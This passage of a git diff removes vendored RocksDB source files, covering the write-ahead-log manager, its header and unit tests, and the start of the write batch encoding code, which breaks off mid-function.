-      MutexLock l(&read_first_record_cache_mutex_);
-      read_first_record_cache_.erase(archived_logs[i]->LogNumber());
-    }
-  }
-}
-
-void WalManager::ArchiveWALFile(const std::string& fname, uint64_t number) {
-  auto archived_log_name = ArchivedLogFileName(db_options_.wal_dir, number);
-  // The sync point below is used in (DBTest,TransactionLogIteratorRace)
-  TEST_SYNC_POINT("WalManager::PurgeObsoleteFiles:1");
-  Status s = env_->RenameFile(fname, archived_log_name);
-  // The sync point below is used in (DBTest,TransactionLogIteratorRace)
-  TEST_SYNC_POINT("WalManager::PurgeObsoleteFiles:2");
-  ROCKS_LOG_INFO(db_options_.info_log, "Move log file %s to %s -- %s\n",
-                 fname.c_str(), archived_log_name.c_str(),
-                 s.ToString().c_str());
-}
-
-namespace {
-struct CompareLogByPointer {
-  bool operator()(const std::unique_ptr<LogFile>& a,
-                  const std::unique_ptr<LogFile>& b) {
-    LogFileImpl* a_impl = static_cast_with_check<LogFileImpl, LogFile>(a.get());
-    LogFileImpl* b_impl = static_cast_with_check<LogFileImpl, LogFile>(b.get());
-    return *a_impl < *b_impl;
-  }
-};
-}
-
-Status WalManager::GetSortedWalsOfType(const std::string& path,
-                                       VectorLogPtr& log_files,
-                                       WalFileType log_type) {
-  std::vector<std::string> all_files;
-  const Status status = env_->GetChildren(path, &all_files);
-  if (!status.ok()) {
-    return status;
-  }
-  log_files.reserve(all_files.size());
-  for (const auto& f : all_files) {
-    uint64_t number;
-    FileType type;
-    if (ParseFileName(f, &number, &type) && type == kLogFile) {
-      SequenceNumber sequence;
-      Status s = ReadFirstRecord(log_type, number, &sequence);
-      if (!s.ok()) {
-        return s;
-      }
-      if (sequence == 0) {
-        // empty file
-        continue;
-      }
-
-      // Reproduce the race condition where a log file is moved
-      // to archived dir, between these two sync points, used in
-      // (DBTest,TransactionLogIteratorRace)
-      TEST_SYNC_POINT("WalManager::GetSortedWalsOfType:1");
-      TEST_SYNC_POINT("WalManager::GetSortedWalsOfType:2");
-
-      uint64_t size_bytes;
-      s = env_->GetFileSize(LogFileName(path, number), &size_bytes);
-      // re-try in case the alive log file has been moved to archive.
-      std::string archived_file = ArchivedLogFileName(path, number);
-      if (!s.ok() && log_type == kAliveLogFile &&
-          env_->FileExists(archived_file).ok()) {
-        s = env_->GetFileSize(archived_file, &size_bytes);
-        if (!s.ok() && env_->FileExists(archived_file).IsNotFound()) {
-          // oops, the file just got deleted from archived dir! move on
-          s = Status::OK();
-          continue;
-        }
-      }
-      if (!s.ok()) {
-        return s;
-      }
-
-      log_files.push_back(std::unique_ptr<LogFile>(
-          new LogFileImpl(number, log_type, sequence, size_bytes)));
-    }
-  }
-  CompareLogByPointer compare_log_files;
-  std::sort(log_files.begin(), log_files.end(), compare_log_files);
-  return status;
-}
-
-Status WalManager::RetainProbableWalFiles(VectorLogPtr& all_logs,
-                                          const SequenceNumber target) {
-  int64_t start = 0;  // signed to avoid overflow when target is < first file.
-  int64_t end = static_cast<int64_t>(all_logs.size()) - 1;
-  // Binary Search. avoid opening all files.
-  while (end >= start) {
-    int64_t mid = start + (end - start) / 2;  // Avoid overflow.
-    SequenceNumber current_seq_num = all_logs.at(mid)->StartSequence();
-    if (current_seq_num == target) {
-      end = mid;
-      break;
-    } else if (current_seq_num < target) {
-      start = mid + 1;
-    } else {
-      end = mid - 1;
-    }
-  }
-  // end could be -ve.
-  size_t start_index = std::max(static_cast<int64_t>(0), end);
-  // The last wal file is always included
-  all_logs.erase(all_logs.begin(), all_logs.begin() + start_index);
-  return Status::OK();
-}
-
-Status WalManager::ReadFirstRecord(const WalFileType type,
-                                   const uint64_t number,
-                                   SequenceNumber* sequence) {
-  *sequence = 0;
-  if (type != kAliveLogFile && type != kArchivedLogFile) {
-    ROCKS_LOG_ERROR(db_options_.info_log, "[WalManger] Unknown file type %s",
-                    ToString(type).c_str());
-    return Status::NotSupported(
-        "File Type Not Known " + ToString(type));
-  }
-  {
-    MutexLock l(&read_first_record_cache_mutex_);
-    auto itr = read_first_record_cache_.find(number);
-    if (itr != read_first_record_cache_.end()) {
-      *sequence = itr->second;
-      return Status::OK();
-    }
-  }
-  Status s;
-  if (type == kAliveLogFile) {
-    std::string fname = LogFileName(db_options_.wal_dir, number);
-    s = ReadFirstLine(fname, number, sequence);
-    if (env_->FileExists(fname).ok() && !s.ok()) {
-      // return any error that is not caused by non-existing file
-      return s;
-    }
-  }
-
-  if (type == kArchivedLogFile || !s.ok()) {
-    //  check if the file got moved to archive.
-    std::string archived_file =
-        ArchivedLogFileName(db_options_.wal_dir, number);
-    s = ReadFirstLine(archived_file, number, sequence);
-    // maybe the file was deleted from archive dir. If that's the case, return
-    // Status::OK(). The caller with identify this as empty file because
-    // *sequence == 0
-    if (!s.ok() && env_->FileExists(archived_file).IsNotFound()) {
-      return Status::OK();
-    }
-  }
-
-  if (s.ok() && *sequence != 0) {
-    MutexLock l(&read_first_record_cache_mutex_);
-    read_first_record_cache_.insert({number, *sequence});
-  }
-  return s;
-}
-
-// the function returns status.ok() and sequence == 0 if the file exists, but is
-// empty
-Status WalManager::ReadFirstLine(const std::string& fname,
-                                 const uint64_t number,
-                                 SequenceNumber* sequence) {
-  struct LogReporter : public log::Reader::Reporter {
-    Env* env;
-    Logger* info_log;
-    const char* fname;
-
-    Status* status;
-    bool ignore_error;  // true if db_options_.paranoid_checks==false
-    virtual void Corruption(size_t bytes, const Status& s) override {
-      ROCKS_LOG_WARN(info_log, "[WalManager] %s%s: dropping %d bytes; %s",
-                     (this->ignore_error ? "(ignoring error) " : ""), fname,
-                     static_cast<int>(bytes), s.ToString().c_str());
-      if (this->status->ok()) {
-        // only keep the first error
-        *this->status = s;
-      }
-    }
-  };
-
-  std::unique_ptr<SequentialFile> file;
-  Status status = env_->NewSequentialFile(
-      fname, &file, env_->OptimizeForLogRead(env_options_));
-  unique_ptr<SequentialFileReader> file_reader(
-      new SequentialFileReader(std::move(file)));
-
-  if (!status.ok()) {
-    return status;
-  }
-
-  LogReporter reporter;
-  reporter.env = env_;
-  reporter.info_log = db_options_.info_log.get();
-  reporter.fname = fname.c_str();
-  reporter.status = &status;
-  reporter.ignore_error = !db_options_.paranoid_checks;
-  log::Reader reader(db_options_.info_log, std::move(file_reader), &reporter,
-                     true /*checksum*/, 0 /*initial_offset*/, number);
-  std::string scratch;
-  Slice record;
-
-  if (reader.ReadRecord(&record, &scratch) &&
-      (status.ok() || !db_options_.paranoid_checks)) {
-    if (record.size() < WriteBatchInternal::kHeader) {
-      reporter.Corruption(record.size(),
-                          Status::Corruption("log record too small"));
-      // TODO read record's till the first no corrupt entry?
-    } else {
-      WriteBatch batch;
-      WriteBatchInternal::SetContents(&batch, record);
-      *sequence = WriteBatchInternal::Sequence(&batch);
-      return Status::OK();
-    }
-  }
-
-  // ReadRecord returns false on EOF, which means that the log file is empty. we
-  // return status.ok() in that case and set sequence number to 0
-  *sequence = 0;
-  return status;
-}
-
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/wal_manager.h b/thirdparty/rocksdb/db/wal_manager.h
deleted file mode 100644
index aa62d79..0000000
--- a/thirdparty/rocksdb/db/wal_manager.h
+++ /dev/null
@@ -1,95 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <atomic>
-#include <deque>
-#include <limits>
-#include <set>
-#include <utility>
-#include <vector>
-#include <string>
-#include <memory>
-
-#include "db/version_set.h"
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/status.h"
-#include "rocksdb/transaction_log.h"
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-class WalManager {
- public:
-  WalManager(const ImmutableDBOptions& db_options,
-             const EnvOptions& env_options)
-      : db_options_(db_options),
-        env_options_(env_options),
-        env_(db_options.env),
-        purge_wal_files_last_run_(0) {}
-
-  Status GetSortedWalFiles(VectorLogPtr& files);
-
-  Status GetUpdatesSince(
-      SequenceNumber seq_number, std::unique_ptr<TransactionLogIterator>* iter,
-      const TransactionLogIterator::ReadOptions& read_options,
-      VersionSet* version_set);
-
-  void PurgeObsoleteWALFiles();
-
-  void ArchiveWALFile(const std::string& fname, uint64_t number);
-
-  Status TEST_ReadFirstRecord(const WalFileType type, const uint64_t number,
-                              SequenceNumber* sequence) {
-    return ReadFirstRecord(type, number, sequence);
-  }
-
-  Status TEST_ReadFirstLine(const std::string& fname, const uint64_t number,
-                            SequenceNumber* sequence) {
-    return ReadFirstLine(fname, number, sequence);
-  }
-
- private:
-  Status GetSortedWalsOfType(const std::string& path, VectorLogPtr& log_files,
-                             WalFileType type);
-  // Requires: all_logs should be sorted with earliest log file first
-  // Retains all log files in all_logs which contain updates with seq no.
-  // Greater Than or Equal to the requested SequenceNumber.
-  Status RetainProbableWalFiles(VectorLogPtr& all_logs,
-                                const SequenceNumber target);
-
-  Status ReadFirstRecord(const WalFileType type, const uint64_t number,
-                         SequenceNumber* sequence);
-
-  Status ReadFirstLine(const std::string& fname, const uint64_t number,
-                       SequenceNumber* sequence);
-
-  // ------- state from DBImpl ------
-  const ImmutableDBOptions& db_options_;
-  const EnvOptions& env_options_;
-  Env* env_;
-
-  // ------- WalManager state -------
-  // cache for ReadFirstRecord() calls
-  std::unordered_map<uint64_t, SequenceNumber> read_first_record_cache_;
-  port::Mutex read_first_record_cache_mutex_;
-
-  // last time when PurgeObsoleteWALFiles ran.
-  uint64_t purge_wal_files_last_run_;
-
-  // obsolete files will be deleted every this seconds if ttl deletion is
-  // enabled and archive size_limit is disabled.
-  static const uint64_t kDefaultIntervalToDeleteObsoleteWAL = 600;
-};
-
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/wal_manager_test.cc b/thirdparty/rocksdb/db/wal_manager_test.cc
deleted file mode 100644
index 9f5cf27..0000000
--- a/thirdparty/rocksdb/db/wal_manager_test.cc
+++ /dev/null
@@ -1,310 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <map>
-#include <string>
-
-#include "rocksdb/cache.h"
-#include "rocksdb/write_batch.h"
-#include "rocksdb/write_buffer_manager.h"
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "db/log_writer.h"
-#include "db/version_set.h"
-#include "db/wal_manager.h"
-#include "env/mock_env.h"
-#include "table/mock_table.h"
-#include "util/file_reader_writer.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-// TODO(icanadi) mock out VersionSet
-// TODO(icanadi) move other WalManager-specific tests from db_test here
-class WalManagerTest : public testing::Test {
- public:
-  WalManagerTest()
-      : env_(new MockEnv(Env::Default())),
-        dbname_(test::TmpDir() + "/wal_manager_test"),
-        db_options_(),
-        table_cache_(NewLRUCache(50000, 16)),
-        write_buffer_manager_(db_options_.db_write_buffer_size),
-        current_log_number_(0) {
-    DestroyDB(dbname_, Options());
-  }
-
-  void Init() {
-    ASSERT_OK(env_->CreateDirIfMissing(dbname_));
-    ASSERT_OK(env_->CreateDirIfMissing(ArchivalDirectory(dbname_)));
-    db_options_.db_paths.emplace_back(dbname_,
-                                      std::numeric_limits<uint64_t>::max());
-    db_options_.wal_dir = dbname_;
-    db_options_.env = env_.get();
-
-    versions_.reset(new VersionSet(dbname_, &db_options_, env_options_,
-                                   table_cache_.get(), &write_buffer_manager_,
-                                   &write_controller_));
-
-    wal_manager_.reset(new WalManager(db_options_, env_options_));
-  }
-
-  void Reopen() {
-    wal_manager_.reset(new WalManager(db_options_, env_options_));
-  }
-
-  // NOT thread safe
-  void Put(const std::string& key, const std::string& value) {
-    assert(current_log_writer_.get() != nullptr);
-    uint64_t seq =  versions_->LastSequence() + 1;
-    WriteBatch batch;
-    batch.Put(key, value);
-    WriteBatchInternal::SetSequence(&batch, seq);
-    current_log_writer_->AddRecord(WriteBatchInternal::Contents(&batch));
-    versions_->SetLastToBeWrittenSequence(seq);
-    versions_->SetLastSequence(seq);
-  }
-
-  // NOT thread safe
-  void RollTheLog(bool archived) {
-    current_log_number_++;
-    std::string fname = ArchivedLogFileName(dbname_, current_log_number_);
-    unique_ptr<WritableFile> file;
-    ASSERT_OK(env_->NewWritableFile(fname, &file, env_options_));
-    unique_ptr<WritableFileWriter> file_writer(
-        new WritableFileWriter(std::move(file), env_options_));
-    current_log_writer_.reset(new log::Writer(std::move(file_writer), 0, false));
-  }
-
-  void CreateArchiveLogs(int num_logs, int entries_per_log) {
-    for (int i = 1; i <= num_logs; ++i) {
-      RollTheLog(true);
-      for (int k = 0; k < entries_per_log; ++k) {
-        Put(ToString(k), std::string(1024, 'a'));
-      }
-    }
-  }
-
-  std::unique_ptr<TransactionLogIterator> OpenTransactionLogIter(
-      const SequenceNumber seq) {
-    unique_ptr<TransactionLogIterator> iter;
-    Status status = wal_manager_->GetUpdatesSince(
-        seq, &iter, TransactionLogIterator::ReadOptions(), versions_.get());
-    EXPECT_OK(status);
-    return iter;
-  }
-
-  std::unique_ptr<MockEnv> env_;
-  std::string dbname_;
-  ImmutableDBOptions db_options_;
-  WriteController write_controller_;
-  EnvOptions env_options_;
-  std::shared_ptr<Cache> table_cache_;
-  WriteBufferManager write_buffer_manager_;
-  std::unique_ptr<VersionSet> versions_;
-  std::unique_ptr<WalManager> wal_manager_;
-
-  std::unique_ptr<log::Writer> current_log_writer_;
-  uint64_t current_log_number_;
-};
-
-TEST_F(WalManagerTest, ReadFirstRecordCache) {
-  Init();
-  std::string path = dbname_ + "/000001.log";
-  unique_ptr<WritableFile> file;
-  ASSERT_OK(env_->NewWritableFile(path, &file, EnvOptions()));
-
-  SequenceNumber s;
-  ASSERT_OK(wal_manager_->TEST_ReadFirstLine(path, 1 /* number */, &s));
-  ASSERT_EQ(s, 0U);
-
-  ASSERT_OK(
-      wal_manager_->TEST_ReadFirstRecord(kAliveLogFile, 1 /* number */, &s));
-  ASSERT_EQ(s, 0U);
-
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(file), EnvOptions()));
-  log::Writer writer(std::move(file_writer), 1,
-                     db_options_.recycle_log_file_num > 0);
-  WriteBatch batch;
-  batch.Put("foo", "bar");
-  WriteBatchInternal::SetSequence(&batch, 10);
-  writer.AddRecord(WriteBatchInternal::Contents(&batch));
-
-  // TODO(icanadi) move SpecialEnv outside of db_test, so we can reuse it here.
-  // Waiting for lei to finish with db_test
-  // env_->count_sequential_reads_ = true;
-  // sequential_read_counter_ sanity test
-  // ASSERT_EQ(env_->sequential_read_counter_.Read(), 0);
-
-  ASSERT_OK(wal_manager_->TEST_ReadFirstRecord(kAliveLogFile, 1, &s));
-  ASSERT_EQ(s, 10U);
-  // did a read
-  // TODO(icanadi) move SpecialEnv outside of db_test, so we can reuse it here
-  // ASSERT_EQ(env_->sequential_read_counter_.Read(), 1);
-
-  ASSERT_OK(wal_manager_->TEST_ReadFirstRecord(kAliveLogFile, 1, &s));
-  ASSERT_EQ(s, 10U);
-  // no new reads since the value is cached
-  // TODO(icanadi) move SpecialEnv outside of db_test, so we can reuse it here
-  // ASSERT_EQ(env_->sequential_read_counter_.Read(), 1);
-}
-
-namespace {
-uint64_t GetLogDirSize(std::string dir_path, Env* env) {
-  uint64_t dir_size = 0;
-  std::vector<std::string> files;
-  env->GetChildren(dir_path, &files);
-  for (auto& f : files) {
-    uint64_t number;
-    FileType type;
-    if (ParseFileName(f, &number, &type) && type == kLogFile) {
-      std::string const file_path = dir_path + "/" + f;
-      uint64_t file_size;
-      env->GetFileSize(file_path, &file_size);
-      dir_size += file_size;
-    }
-  }
-  return dir_size;
-}
-std::vector<std::uint64_t> ListSpecificFiles(
-    Env* env, const std::string& path, const FileType expected_file_type) {
-  std::vector<std::string> files;
-  std::vector<uint64_t> file_numbers;
-  env->GetChildren(path, &files);
-  uint64_t number;
-  FileType type;
-  for (size_t i = 0; i < files.size(); ++i) {
-    if (ParseFileName(files[i], &number, &type)) {
-      if (type == expected_file_type) {
-        file_numbers.push_back(number);
-      }
-    }
-  }
-  return file_numbers;
-}
-
-int CountRecords(TransactionLogIterator* iter) {
-  int count = 0;
-  SequenceNumber lastSequence = 0;
-  BatchResult res;
-  while (iter->Valid()) {
-    res = iter->GetBatch();
-    EXPECT_TRUE(res.sequence > lastSequence);
-    ++count;
-    lastSequence = res.sequence;
-    EXPECT_OK(iter->status());
-    iter->Next();
-  }
-  return count;
-}
-}  // namespace
-
-TEST_F(WalManagerTest, WALArchivalSizeLimit) {
-  db_options_.wal_ttl_seconds = 0;
-  db_options_.wal_size_limit_mb = 1000;
-  Init();
-
-  // TEST : Create WalManager with huge size limit and no ttl.
-  // Create some archived files and call PurgeObsoleteWALFiles().
-  // Count the archived log files that survived.
-  // Assert that all of them did.
-  // Change size limit. Re-open WalManager.
-  // Assert that archive is not greater than wal_size_limit_mb after
-  // PurgeObsoleteWALFiles()
-  // Set ttl and time_to_check_ to small values. Re-open db.
-  // Assert that there are no archived logs left.
-
-  std::string archive_dir = ArchivalDirectory(dbname_);
-  CreateArchiveLogs(20, 5000);
-
-  std::vector<std::uint64_t> log_files =
-      ListSpecificFiles(env_.get(), archive_dir, kLogFile);
-  ASSERT_EQ(log_files.size(), 20U);
-
-  db_options_.wal_size_limit_mb = 8;
-  Reopen();
-  wal_manager_->PurgeObsoleteWALFiles();
-
-  uint64_t archive_size = GetLogDirSize(archive_dir, env_.get());
-  ASSERT_TRUE(archive_size <= db_options_.wal_size_limit_mb * 1024 * 1024);
-
-  db_options_.wal_ttl_seconds = 1;
-  env_->FakeSleepForMicroseconds(2 * 1000 * 1000);
-  Reopen();
-  wal_manager_->PurgeObsoleteWALFiles();
-
-  log_files = ListSpecificFiles(env_.get(), archive_dir, kLogFile);
-  ASSERT_TRUE(log_files.empty());
-}
-
-TEST_F(WalManagerTest, WALArchivalTtl) {
-  db_options_.wal_ttl_seconds = 1000;
-  Init();
-
-  // TEST : Create WalManager with a ttl and no size limit.
-  // Create some archived log files and call PurgeObsoleteWALFiles().
-  // Assert that files are not deleted
-  // Reopen db with small ttl.
-  // Assert that all archived logs was removed.
-
-  std::string archive_dir = ArchivalDirectory(dbname_);
-  CreateArchiveLogs(20, 5000);
-
-  std::vector<uint64_t> log_files =
-      ListSpecificFiles(env_.get(), archive_dir, kLogFile);
-  ASSERT_GT(log_files.size(), 0U);
-
-  db_options_.wal_ttl_seconds = 1;
-  env_->FakeSleepForMicroseconds(3 * 1000 * 1000);
-  Reopen();
-  wal_manager_->PurgeObsoleteWALFiles();
-
-  log_files = ListSpecificFiles(env_.get(), archive_dir, kLogFile);
-  ASSERT_TRUE(log_files.empty());
-}
-
-TEST_F(WalManagerTest, TransactionLogIteratorMoveOverZeroFiles) {
-  Init();
-  RollTheLog(false);
-  Put("key1", std::string(1024, 'a'));
-  // Create a zero record WAL file.
-  RollTheLog(false);
-  RollTheLog(false);
-
-  Put("key2", std::string(1024, 'a'));
-
-  auto iter = OpenTransactionLogIter(0);
-  ASSERT_EQ(2, CountRecords(iter.get()));
-}
-
-TEST_F(WalManagerTest, TransactionLogIteratorJustEmptyFile) {
-  Init();
-  RollTheLog(false);
-  auto iter = OpenTransactionLogIter(0);
-  // Check that an empty iterator is returned
-  ASSERT_TRUE(!iter->Valid());
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as WalManager is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/write_batch.cc b/thirdparty/rocksdb/db/write_batch.cc
deleted file mode 100644
index 76fc948..0000000
--- a/thirdparty/rocksdb/db/write_batch.cc
+++ /dev/null
@@ -1,1451 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// WriteBatch::rep_ :=
-//    sequence: fixed64
-//    count: fixed32
-//    data: record[count]
-// record :=
-//    kTypeValue varstring varstring
-//    kTypeDeletion varstring
-//    kTypeSingleDeletion varstring
-//    kTypeMerge varstring varstring
-//    kTypeColumnFamilyValue varint32 varstring varstring
-//    kTypeColumnFamilyDeletion varint32 varstring varstring
-//    kTypeColumnFamilySingleDeletion varint32 varstring varstring
-//    kTypeColumnFamilyMerge varint32 varstring varstring
-//    kTypeBeginPrepareXID varstring
-//    kTypeEndPrepareXID
-//    kTypeCommitXID varstring
-//    kTypeRollbackXID varstring
-//    kTypeNoop
-// varstring :=
-//    len: varint32
-//    data: uint8[len]
-
-#include "rocksdb/write_batch.h"
-
-#include <map>
-#include <stack>
-#include <stdexcept>
-#include <type_traits>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "db/flush_scheduler.h"
-#include "db/memtable.h"
-#include "db/merge_context.h"
-#include "db/snapshot_impl.h"
-#include "db/write_batch_internal.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/statistics.h"
-#include "rocksdb/merge_operator.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-// anon namespace for file-local types
-namespace {
-
-enum ContentFlags : uint32_t {
-  DEFERRED = 1 << 0,
-  HAS_PUT = 1 << 1,
-  HAS_DELETE = 1 << 2,
-  HAS_SINGLE_DELETE = 1 << 3,
-  HAS_MERGE = 1 << 4,
-  HAS_BEGIN_PREPARE = 1 << 5,
-  HAS_END_PREPARE = 1 << 6,
-  HAS_COMMIT = 1 << 7,
-  HAS_ROLLBACK = 1 << 8,
-  HAS_DELETE_RANGE = 1 << 9,
-  HAS_BLOB_INDEX = 1 << 10,
-};
-
-struct BatchContentClassifier : public WriteBatch::Handler {
-  uint32_t content_flags = 0;
-
-  Status PutCF(uint32_t, const Slice&, const Slice&) override {
-    content_flags |= ContentFlags::HAS_PUT;
-    return Status::OK();
-  }
-
-  Status DeleteCF(uint32_t, const Slice&) override {
-    content_flags |= ContentFlags::HAS_DELETE;
-    return Status::OK();
-  }
-
-  Status SingleDeleteCF(uint32_t, const Slice&) override {
-    content_flags |= ContentFlags::HAS_SINGLE_DELETE;
-    return Status::OK();
-  }
-
-  Status DeleteRangeCF(uint32_t, const Slice&, const Slice&) override {
-    content_flags |= ContentFlags::HAS_DELETE_RANGE;
-    return Status::OK();
-  }
-
-  Status MergeCF(uint32_t, const Slice&, const Slice&) override {
-    content_flags |= ContentFlags::HAS_MERGE;
-    return Status::OK();
-  }
-
-  Status PutBlobIndexCF(uint32_t, const Slice&, const Slice&) override {
-    content_flags |= ContentFlags::HAS_BLOB_INDEX;
-    return Status::OK();
-  }
-
-  Status MarkBeginPrepare() override {
-    content_flags |= ContentFlags::HAS_BEGIN_PREPARE;
-    return Status::OK();
-  }
-
-  Status MarkEndPrepare(const Slice&) override {
-    content_flags |= ContentFlags::HAS_END_PREPARE;
-    return Status::OK();
-  }
-
-  Status MarkCommit(const Slice&) override {
-    content_flags |= ContentFlags::HAS_COMMIT;
-    return Status::OK();
-  }
-
-  Status MarkRollback(const Slice&) override {
-    content_flags |= ContentFlags::HAS_ROLLBACK;
-    return Status::OK();
-  }
-};
-
-}  // anon namespace
-
-struct SavePoints {
-  std::stack<SavePoint> stack;
-};
-
-WriteBatch::WriteBatch(size_t reserved_bytes, size_t max_bytes)
-    : save_points_(nullptr), content_flags_(0), max_bytes_(max_bytes), rep_() {
-  rep_.reserve((reserved_bytes > WriteBatchInternal::kHeader) ?
-    reserved_bytes : WriteBatchInternal::kHeader);
-  rep_.resize(WriteBatchInternal::kHeader);
-}
-
-WriteBatch::WriteBatch(const std::string& rep)
-    : save_points_(nullptr),
-      content_flags_(ContentFlags::DEFERRED),
-      max_bytes_(0),
-      rep_(rep) {}
-
-WriteBatch::WriteBatch(const WriteBatch& src)
-    : save_points_(src.save_points_),
-      wal_term_point_(src.wal_term_point_),
-      content_flags_(src.content_flags_.load(std::memory_order_relaxed)),
-      max_bytes_(src.max_bytes_),
-      rep_(src.rep_) {}
-
-WriteBatch::WriteBatch(WriteBatch&& src)
-    : save_points_(std::move(src.save_points_)),
-      wal_term_point_(std::move(src.wal_term_point_)),
-      content_flags_(src.content_flags_.load(std::memory_order_relaxed)),
-      max_bytes_(src.max_bytes_),
-      rep_(std::move(src.rep_)) {}
-
-WriteBatch& WriteBatch::operator=(const WriteBatch& src) {
-  if (&src != this) {
-    this->~WriteBatch();
-    new (this) WriteBatch(src);
-  }
-  return *this;
-}
-
-WriteBatch& WriteBatch::operator=(WriteBatch&& src) {
-  if (&src != this) {
-    this->~WriteBatch();
-    new (this) WriteBatch(std::move(src));
-  }
-  return *this;
-}
-
-WriteBatch::~WriteBatch() { delete save_points_; }
-
-WriteBatch::Handler::~Handler() { }
-
-void WriteBatch::Handler::LogData(const Slice& blob) {
-  // If the user has not specified something to do with blobs, then we ignore
-  // them.
-}
-
-bool WriteBatch::Handler::Continue() {
-  return true;
-}
-
-void WriteBatch::Clear() {
-  rep_.clear();
-  rep_.resize(WriteBatchInternal::kHeader);
-
-  content_flags_.store(0, std::memory_order_relaxed);
-
-  if (save_points_ != nullptr) {
-    while (!save_points_->stack.empty()) {
-      save_points_->stack.pop();
-    }
-  }
-
-  wal_term_point_.clear();
-}
-
-int WriteBatch::Count() const {
-  return WriteBatchInternal::Count(this);
-}
-
-uint32_t WriteBatch::ComputeContentFlags() const {
-  auto rv = content_flags_.load(std::memory_order_relaxed);
-  if ((rv & ContentFlags::DEFERRED) != 0) {
-    BatchContentClassifier classifier;
-    Iterate(&classifier);
-    rv = classifier.content_flags;
-
-    // this method is conceptually const, because it is performing a lazy
-    // computation that doesn't affect the abstract state of the batch.
-    // content_flags_ is marked mutable so that we can perform the
-    // following assignment
-    content_flags_.store(rv, std::memory_order_relaxed);
-  }
-  return rv;
-}
-
-void WriteBatch::MarkWalTerminationPoint() {
-  wal_term_point_.size = GetDataSize();
-  wal_term_point_.count = Count();
-  wal_term_point_.content_flags = content_flags_;
-}
-
-bool WriteBatch::HasPut() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_PUT) != 0;
-}
-
-bool WriteBatch::HasDelete() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_DELETE) != 0;
-}
-
-bool WriteBatch::HasSingleDelete() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_SINGLE_DELETE) != 0;
-}
-
-bool WriteBatch::HasDeleteRange() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_DELETE_RANGE) != 0;
-}
-
-bool WriteBatch::HasMerge() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_MERGE) != 0;
-}
-
-bool ReadKeyFromWriteBatchEntry(Slice* input, Slice* key, bool cf_record) {
-  assert(input != nullptr && key != nullptr);
-  // Skip tag byte
-  input->remove_prefix(1);
-
-  if (cf_record) {
-    // Skip column_family bytes
-    uint32_t cf;
-    if (!GetVarint32(input, &cf)) {
-      return false;
-    }
-  }
-
-  // Extract key
-  return GetLengthPrefixedSlice(input, key);
-}
-
-bool WriteBatch::HasBeginPrepare() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_BEGIN_PREPARE) != 0;
-}
-
-bool WriteBatch::HasEndPrepare() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_END_PREPARE) != 0;
-}
-
-bool WriteBatch::HasCommit() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_COMMIT) != 0;
-}
-
-bool WriteBatch::HasRollback() const {
-  return (ComputeContentFlags() & ContentFlags::HAS_ROLLBACK) != 0;
-}
-
-Status ReadRecordFromWriteBatch(Slice* input, char* tag,
-                                uint32_t* column_family, Slice* key,
-                                Slice* value, Slice* blob, Slice* xid) {
-  assert(key != nullptr && value != nullptr);
-  *tag = (*input)[0];
-  input->remove_prefix(1);
-  *column_family = 0;  // default
-  switch (*tag) {
-    case kTypeColumnFamilyValue:
-      if (!GetVarint32(input, column_family)) {
-        return Status::Corruption("bad WriteBatch Put");
-      }
-    // intentional fallthrough
-    case kTypeValue:
-      if (!GetLengthPrefixedSlice(input, key) ||
-          !GetLengthPrefixedSlice(input, value)) {
-        return Status::Corruption("bad WriteBatch Put");
-      }
-      break;
-    case kTypeColumnFamilyDeletion:
-    case kTypeColumnFamilySingleDeletion:
-      if (!GetVarint32(input, column_family)) {
-        return Status::Corruption("bad WriteBatch Delete");
-      }
-    // intentional fallthrough
-    case kTypeDeletion:
-    case kTypeSingleDeletion:
-      if (!GetLengthPrefixedSlice(input, key)) {
-        return Status::Corruption("bad WriteBatch Delete");
-      }
-      break;
-    case kTypeColumnFamilyRangeDeletion:
-      if (!GetVarint32(input, column_family)) {
-        return Status::Corruption("bad WriteBatch DeleteRange");
-      }
-    // intentional fallthrough
-    case kTypeRangeDeletion:
